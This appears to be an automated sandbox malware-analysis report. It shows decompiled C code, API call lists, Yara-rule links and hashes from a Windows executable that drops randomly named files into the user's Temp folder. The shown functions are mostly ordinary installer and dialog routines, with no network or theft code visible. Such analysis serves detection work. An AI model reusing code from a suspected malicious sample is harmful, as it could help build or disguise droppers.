                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                    • String ID: "C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj$A$C:\Users\user\AppData\Local\Temp$H7B
                                                    • API String ID: 2624150263-2616050358
                                                    • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                    • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                    • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                    • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\alfons\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                    0x004021b3
                                                    0x004021bd
                                                    0x004021c7
                                                    0x004021d1
                                                    0x004021dc
                                                    0x004021df
                                                    0x004021f9
                                                    0x004021fc
                                                    0x00402202
                                                    0x00402205
                                                    0x0040220f
                                                    0x00402213
                                                    0x00402213
                                                    0x00402218
                                                    0x00402229
                                                    0x00402231
                                                    0x004022e8
                                                    0x004022e8
                                                    0x004022ef
                                                    0x00402237
                                                    0x00402237
                                                    0x00402246
                                                    0x0040224a
                                                    0x0040224d
                                                    0x00402253
                                                    0x00402261
                                                    0x00402264
                                                    0x00402266
                                                    0x00402271
                                                    0x00402271
                                                    0x00402276
                                                    0x00402278
                                                    0x0040227f
                                                    0x0040227f
                                                    0x00402282
                                                    0x0040228b
                                                    0x0040228e
                                                    0x00402294
                                                    0x00402296
                                                    0x004022a0
                                                    0x004022a0
                                                    0x004022a3
                                                    0x004022ac
                                                    0x004022af
                                                    0x004022b8
                                                    0x004022be
                                                    0x004022c0
                                                    0x004022ce
                                                    0x004022ce
                                                    0x004022d1
                                                    0x004022d7
                                                    0x004022d7
                                                    0x004022da
                                                    0x004022e0
                                                    0x004022e6
                                                    0x004022fb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004022e6
                                                    0x004022f1
                                                    0x00402c2d
                                                    0x00402c39

                                                    APIs
                                                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: CreateInstance
                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                    • API String ID: 542301482-1943935188
                                                    • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                    • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                    • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                    • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 39%
                                                    			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                    0x00402923
                                                    0x0040293e
                                                    0x00402949
                                                    0x0040294a
                                                    0x00402a94
                                                    0x00402925
                                                    0x00402928
                                                    0x0040292b
                                                    0x0040292e
                                                    0x0040292e
                                                    0x00402c2d
                                                    0x00402c39

                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst
                                                    • String ID:
                                                    • API String ID: 1974802433-0
                                                    • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                    • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                    • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                    • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                    0x00405038
                                                    0x00405051
                                                    0x00405056
                                                    0x0040505e
                                                    0x00405064
                                                    0x0040507a
                                                    0x0040507d
                                                    0x004052a8
                                                    0x004052af
                                                    0x004052c3
                                                    0x004052b1
                                                    0x004052b3
                                                    0x004052b6
                                                    0x004052b7
                                                    0x004052be
                                                    0x004052be
                                                    0x004052cf
                                                    0x004052dd
                                                    0x004052e0
                                                    0x004052f6
                                                    0x0040536b
                                                    0x0040536e
                                                    0x00405370
                                                    0x0040537a
                                                    0x00405388
                                                    0x00405388
                                                    0x0040538a
                                                    0x00405394
                                                    0x0040539a
                                                    0x0040539d
                                                    0x004053a0
                                                    0x004053bb
                                                    0x004053a2
                                                    0x004053ac
                                                    0x004053ac
                                                    0x004053a0
                                                    0x00405394
                                                    0x00000000
                                                    0x0040536e
                                                    0x004052fb
                                                    0x00405306
                                                    0x0040530b
                                                    0x00405312
                                                    0x00405317
                                                    0x0040531b
                                                    0x00405326
                                                    0x00405326
                                                    0x0040532a
                                                    0x0040532e
                                                    0x00405332
                                                    0x00405345
                                                    0x00405334
                                                    0x00405334
                                                    0x0040533b
                                                    0x00405341
                                                    0x0040533d
                                                    0x0040533d
                                                    0x0040533d
                                                    0x0040533b
                                                    0x00405349
                                                    0x0040534b
                                                    0x0040535e
                                                    0x00405361
                                                    0x00405364
                                                    0x00405364
                                                    0x0040532e
                                                    0x00000000
                                                    0x0040531b
                                                    0x004052fd
                                                    0x00405304
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004053be
                                                    0x004053be
                                                    0x004053c5
                                                    0x00405436
                                                    0x0040543e
                                                    0x00405446
                                                    0x00405446
                                                    0x0040544f
                                                    0x00405451
                                                    0x00405458
                                                    0x0040545b
                                                    0x0040545b
                                                    0x00405461
                                                    0x00405468
                                                    0x0040546b
                                                    0x0040546b
                                                    0x00405471
                                                    0x00405477
                                                    0x0040547d
                                                    0x0040547d
                                                    0x0040548a
                                                    0x004055eb
                                                    0x004055f2
                                                    0x0040560f
                                                    0x00405615
                                                    0x00405627
                                                    0x00405627
                                                    0x00000000
                                                    0x00405490
                                                    0x00405492
                                                    0x00405497
                                                    0x0040549c
                                                    0x004054a1
                                                    0x004054a3
                                                    0x004054a3
                                                    0x004054a4
                                                    0x004054a5
                                                    0x004054a7
                                                    0x004054a7
                                                    0x004054af
                                                    0x004054f0
                                                    0x004054f2
                                                    0x00405502
                                                    0x00405505
                                                    0x0040550a
                                                    0x00405511
                                                    0x00405514
                                                    0x004055b6
                                                    0x004055bf
                                                    0x004055c7
                                                    0x004055c7
                                                    0x004055d5
                                                    0x004055e6
                                                    0x004055e6
                                                    0x00000000
                                                    0x004055d5
                                                    0x0040551a
                                                    0x0040551d
                                                    0x00405523
                                                    0x00405528
                                                    0x0040552a
                                                    0x0040552c
                                                    0x00405532
                                                    0x00405539
                                                    0x0040553e
                                                    0x00405545
                                                    0x00405548
                                                    0x00405548
                                                    0x0040554f
                                                    0x0040555b
                                                    0x0040555f
                                                    0x00405561
                                                    0x00405561
                                                    0x00405551
                                                    0x00405553
                                                    0x00405553
                                                    0x00405581
                                                    0x0040558d
                                                    0x0040559c
                                                    0x0040559c
                                                    0x0040559e
                                                    0x004055a1
                                                    0x004055aa
                                                    0x00000000
                                                    0x004054b1
                                                    0x004054bc
                                                    0x004054bf
                                                    0x004054c4
                                                    0x004054c6
                                                    0x004054ca
                                                    0x004054da
                                                    0x004054e4
                                                    0x004054e6
                                                    0x004054e9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004054cc
                                                    0x004054cc
                                                    0x004054d2
                                                    0x004054d4
                                                    0x004054d4
                                                    0x004054d5
                                                    0x004054d6
                                                    0x00000000
                                                    0x004054cc
                                                    0x004054af
                                                    0x0040548a
                                                    0x004053cd
                                                    0x00000000
                                                    0x004053e3
                                                    0x004053ed
                                                    0x004053f2
                                                    0x00000000
                                                    0x00000000
                                                    0x00405404
                                                    0x00405409
                                                    0x00405415
                                                    0x00405415
                                                    0x00405417
                                                    0x00405426
                                                    0x00405428
                                                    0x0040542c
                                                    0x0040542f
                                                    0x00000000
                                                    0x0040542f
                                                    0x004053cd
                                                    0x00405083
                                                    0x00405088
                                                    0x00405091
                                                    0x00405098
                                                    0x004050aa
                                                    0x004050b5
                                                    0x004050bb
                                                    0x004050c9
                                                    0x004050dd
                                                    0x004050e2
                                                    0x004050ef
                                                    0x004050f4
                                                    0x0040510a
                                                    0x0040511b
                                                    0x00405128
                                                    0x00405128
                                                    0x0040512b
                                                    0x00405131
                                                    0x00405133
                                                    0x00405136
                                                    0x0040513b
                                                    0x00405140
                                                    0x00405142
                                                    0x00405142
                                                    0x00405162
                                                    0x00405162
                                                    0x00405164
                                                    0x00405165
                                                    0x0040516a
                                                    0x00405170
                                                    0x00405174
                                                    0x00405179
                                                    0x00405181
                                                    0x00405185
                                                    0x0040518a
                                                    0x0040518f
                                                    0x00405197
                                                    0x0040519a
                                                    0x0040526a
                                                    0x0040527d
                                                    0x00000000
                                                    0x004051a0
                                                    0x004051a3
                                                    0x004051a6
                                                    0x004051a9
                                                    0x004051a9
                                                    0x004051af
                                                    0x004051b8
                                                    0x004051bb
                                                    0x004051bf
                                                    0x004051c2
                                                    0x004051c5
                                                    0x004051ce
                                                    0x004051d7
                                                    0x004051da
                                                    0x004051dd
                                                    0x004051e0
                                                    0x0040521e
                                                    0x00405249
                                                    0x00405220
                                                    0x0040522f
                                                    0x0040522f
                                                    0x004051e2
                                                    0x004051e5
                                                    0x004051f3
                                                    0x004051fd
                                                    0x00405205
                                                    0x0040520c
                                                    0x00405217
                                                    0x00405217
                                                    0x004051e0
                                                    0x0040524f
                                                    0x00405250
                                                    0x0040525c
                                                    0x0040525c
                                                    0x00405268
                                                    0x00405283
                                                    0x00405286
                                                    0x004052a3
                                                    0x00000000
                                                    0x00405288
                                                    0x0040528d
                                                    0x00405296
                                                    0x00405629
                                                    0x0040563b
                                                    0x0040563b
                                                    0x00405286
                                                    0x00000000
                                                    0x00405268
                                                    0x0040519a

                                                    APIs
                                                    • GetDlgItem.USER32 ref: 00405049
                                                    • GetDlgItem.USER32 ref: 00405054
                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                    • LoadImageW.USER32 ref: 004050B5
                                                    • SetWindowLongW.USER32 ref: 004050CE
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                    • DeleteObject.GDI32(00000000), ref: 0040512B
                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                    • SetWindowLongW.USER32 ref: 0040527D
                                                    • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                    • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                    • GlobalFree.KERNEL32 ref: 0040546B
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                    • ShowWindow.USER32(?,00000000), ref: 00405615
                                                    • GetDlgItem.USER32 ref: 00405620
                                                    • ShowWindow.USER32(00000000), ref: 00405627
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
